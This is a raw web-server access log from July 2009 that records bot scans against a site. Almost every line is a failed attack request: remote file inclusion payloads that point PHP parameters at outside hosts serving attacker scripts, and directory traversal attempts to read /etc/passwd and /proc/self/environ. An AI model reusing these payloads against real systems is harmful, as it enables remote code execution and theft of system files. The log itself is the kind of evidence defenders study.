62.2.194.146 - - [18/Jul/2009:05:23:15 -0400] "GET //////////index.php?_REQUEST=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 216 "-" "XXXXXX"
62.2.194.146 - - [18/Jul/2009:05:23:15 -0400] "GET /logs/access_log.Q109060600//////////index.php?_REQUEST=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 243 "-" "XXXXXX"
62.2.194.146 - - [18/Jul/2009:05:23:15 -0400] "GET /logs//////////index.php?_REQUEST=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 221 "-" "XXXXXX"
62.2.194.146 - - [18/Jul/2009:05:23:15 -0400] "GET //////////index.php?_REQUEST=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 216 "-" "XXXXXX"
58.120.227.242 - - [18/Jul/2009:05:23:24 -0400] "GET /logs/access_log.Q109062300/index.php?meio=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
58.120.227.242 - - [18/Jul/2009:05:23:24 -0400] "GET /index.php?meio=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
58.120.227.242 - - [18/Jul/2009:05:23:25 -0400] "GET /logs/index.php?meio=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
218.38.136.251 - - [18/Jul/2009:05:23:27 -0400] "GET ///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:05:23:27 -0400] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:05:23:27 -0400] "GET /logs/access_log.Q109052800///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:05:23:27 -0400] "GET /logs/error_log.Q109052800///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 273 "-" "libwww-perl/5.65"
124.0.145.1 - - [18/Jul/2009:05:23:33 -0400] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:05:23:33 -0400] "GET /logs/access_log.Q109070700%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:05:23:33 -0400] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:05:23:33 -0400] "GET /logs/access_log.Q109071000%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:23:39 -0400] "GET /Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:23:39 -0400] "GET /logs/Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:23:39 -0400] "GET /logs/access_log.Q109051700/Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:23:44 -0400] "GET /logs/access_log.Q109051500/Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.38.136.251 - - [18/Jul/2009:05:23:45 -0400] "GET /logs/error_log.Q109052800%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
211.43.202.66 - - [18/Jul/2009:05:23:49 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:23:49 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:23:49 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
189.73.92.17 - - [18/Jul/2009:05:24:16 -0400] "GET /logs/access_log.Q109060400/skins/advanced/advanced1.php?pluginpath[0]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
189.73.92.17 - - [18/Jul/2009:05:24:16 -0400] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
189.73.92.17 - - [18/Jul/2009:05:24:16 -0400] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
189.73.92.17 - - [18/Jul/2009:05:24:16 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Advanced Browser (http://www.avantbrowser.com)"
189.73.92.17 - - [18/Jul/2009:05:24:16 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Advanced Browser (http://www.avantbrowser.com)"
189.73.92.17 - - [18/Jul/2009:05:24:16 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Advanced Browser (http://www.avantbrowser.com)"
189.73.92.17 - - [18/Jul/2009:05:24:16 -0400] "GET /logs/access_log.Q109060400/skins/advanced/advanced1.php?pluginpath[0]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 253 "-" "XXXXXX"
189.73.92.17 - - [18/Jul/2009:05:24:16 -0400] "GET /skins/advanced/advanced1.php?pluginpath[0]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 226 "-" "XXXXXX"
189.73.92.17 - - [18/Jul/2009:05:24:16 -0400] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 231 "-" "XXXXXX"
189.73.92.17 - - [18/Jul/2009:05:24:17 -0400] "GET /logs/access_log.Q109060400/skins/advanced/advanced1.php?pluginpath[0]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 253 "-" "XXXXXX"
189.73.92.17 - - [18/Jul/2009:05:24:17 -0400] "GET /skins/advanced/advanced1.php?pluginpath[0]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "XXXXXX"
189.73.92.17 - - [18/Jul/2009:05:24:17 -0400] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 231 "-" "XXXXXX"
65.254.216.47 - - [18/Jul/2009:05:24:28 -0400] "GET /logs/access_log.Q109051000/main.php?sayfa=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
65.254.216.47 - - [18/Jul/2009:05:24:29 -0400] "GET /main.php?sayfa=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.810"
65.254.216.47 - - [18/Jul/2009:05:24:31 -0400] "GET /logs/error_log.Q109062300/index.php?meio=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
65.254.216.47 - - [18/Jul/2009:05:24:33 -0400] "GET /logs/main.php?sayfa=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.810"
83.96.135.55 - - [18/Jul/2009:05:24:52 -0400] "GET /logs/error_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.825"
83.96.135.55 - - [18/Jul/2009:05:24:53 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.825"
211.43.202.66 - - [18/Jul/2009:05:25:05 -0400] "GET /Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:25:05 -0400] "GET /logs/Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:25:05 -0400] "GET /logs/access_log.Q109051500%20%20/Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:25:09 -0400] "GET /Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:25:09 -0400] "GET /logs/access_log.Q109051500%20%20/Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:25:09 -0400] "GET /logs/Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:25:22 -0400] "GET /logs/access_log.Q109061000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:25:22 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:25:22 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
65.254.216.47 - - [18/Jul/2009:05:25:24 -0400] "GET /logs/access_log.Q109051800/main.php?sayfa=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
211.43.202.66 - - [18/Jul/2009:05:25:31 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:25:31 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:25:31 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:25:34 -0400] "GET /logs/access_log.Q109051700%20%20/Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:25:35 -0400] "GET /logs/access_log.Q109051700%20%20/Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:25:41 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:25:41 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:25:41 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
201.7.114.18 - - [18/Jul/2009:05:25:54 -0400] "GET /logs/access_log.Q109070600/index.php?pagina=http://2006.aninite.at/mambots/aid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
201.7.114.18 - - [18/Jul/2009:05:25:54 -0400] "GET /index.php?pagina=http://2006.aninite.at/mambots/aid.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
201.7.114.18 - - [18/Jul/2009:05:25:55 -0400] "GET /logs/index.php?pagina=http://2006.aninite.at/mambots/aid.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
211.43.202.66 - - [18/Jul/2009:05:26:00 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:26:00 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:05:26:02 -0400] "GET /logs/access_log.Q109051400//adminhead.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.825"
83.96.135.55 - - [18/Jul/2009:05:26:03 -0400] "GET /logs//adminhead.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.825"
83.96.135.55 - - [18/Jul/2009:05:26:22 -0400] "GET /logs/access_log.Q109051200//setup/header.php?css_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.825"
83.96.135.55 - - [18/Jul/2009:05:26:22 -0400] "GET //setup/header.php?css_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 215 "-" "libwww-perl/5.825"
83.96.135.55 - - [18/Jul/2009:05:26:22 -0400] "GET /logs//setup/header.php?css_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 220 "-" "libwww-perl/5.825"
118.129.166.129 - - [18/Jul/2009:05:26:48 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:05:26:49 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:05:26:49 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.15.55.45 - - [18/Jul/2009:05:26:57 -0400] "GET /logs/access_log.Q109051700///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:05:26:58 -0400] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:05:26:59 -0400] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.803"
62.2.194.146 - - [18/Jul/2009:05:27:06 -0400] "GET /logs/access_log.Q109070300//////////index.php?_REQUEST=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
62.2.194.146 - - [18/Jul/2009:05:27:07 -0400] "GET /logs/access_log.Q109070300/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
62.2.194.146 - - [18/Jul/2009:05:27:07 -0400] "GET /logs/access_log.Q109070300//////////index.php?_REQUEST=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 243 "-" "XXXXXX"
62.2.194.146 - - [18/Jul/2009:05:27:07 -0400] "GET /logs/access_log.Q109070300//////////index.php?_REQUEST=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 243 "-" "XXXXXX"
118.129.166.129 - - [18/Jul/2009:05:27:13 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:05:27:34 -0400] "GET /logs/access_log.Q109051700///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
201.232.54.48 - - [18/Jul/2009:05:27:34 -0400] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
201.232.54.48 - - [18/Jul/2009:05:27:35 -0400] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
211.15.55.45 - - [18/Jul/2009:05:27:35 -0400] "GET /logs/access_log.Q109051700///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:05:27:36 -0400] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:05:27:37 -0400] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.803"
114.200.199.144 - - [18/Jul/2009:05:27:40 -0400] "GET /logs/access_log.Q109061000%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:05:27:44 -0400] "GET /logs/access_log.Q109071500//admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.825"
201.7.114.18 - - [18/Jul/2009:05:27:56 -0400] "GET /logs/access_log.Q109052500/index.php?pagina=http://2006.aninite.at/mambots/aid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.59.12.99 - - [18/Jul/2009:05:28:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.127.253.11 - - [18/Jul/2009:05:28:10 -0400] "GET /logs/access_log.Q109062300/index.php?meio=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
210.127.253.11 - - [18/Jul/2009:05:28:10 -0400] "GET /index.php?meio=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
210.127.253.11 - - [18/Jul/2009:05:28:11 -0400] "GET /logs/index.php?meio=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
211.15.55.45 - - [18/Jul/2009:05:28:23 -0400] "GET /logs/access_log.Q109060400///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
211.43.202.66 - - [18/Jul/2009:05:28:31 -0400] "GET /logs/Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:28:31 -0400] "GET /logs/access_log.Q109051700/Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:28:31 -0400] "GET /Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:28:31 -0400] "GET /Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:28:31 -0400] "GET /logs/Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:28:31 -0400] "GET /logs/access_log.Q109051700/Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:28:35 -0400] "GET /logs/components/registration_detailed.inc.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:28:35 -0400] "GET /logs/access_log.Q109061200/components/registration_detailed.inc.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:28:35 -0400] "GET /components/registration_detailed.inc.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:28:35 -0400] "GET /logs/access_log.Q109051500/Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.43.202.66 - - [18/Jul/2009:05:28:36 -0400] "GET /logs/access_log.Q109051500/Article//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:28:42 -0400] "GET /logs/access_log.Q109061300/components/registration_detailed.inc.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:28:53 -0400] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.15.55.45 - - [18/Jul/2009:05:29:03 -0400] "GET /logs/access_log.Q109060400///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
61.250.85.185 - - [18/Jul/2009:05:29:28 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://2006.aninite.at/mambots/tukulid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
61.250.85.185 - - [18/Jul/2009:05:29:28 -0400] "GET /logs/access_log.Q109070400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://2006.aninite.at/mambots/tukulid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
61.250.85.185 - - [18/Jul/2009:05:29:28 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://2006.aninite.at/mambots/tukulid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
114.200.199.144 - - [18/Jul/2009:05:29:43 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0" 114.200.199.144 - -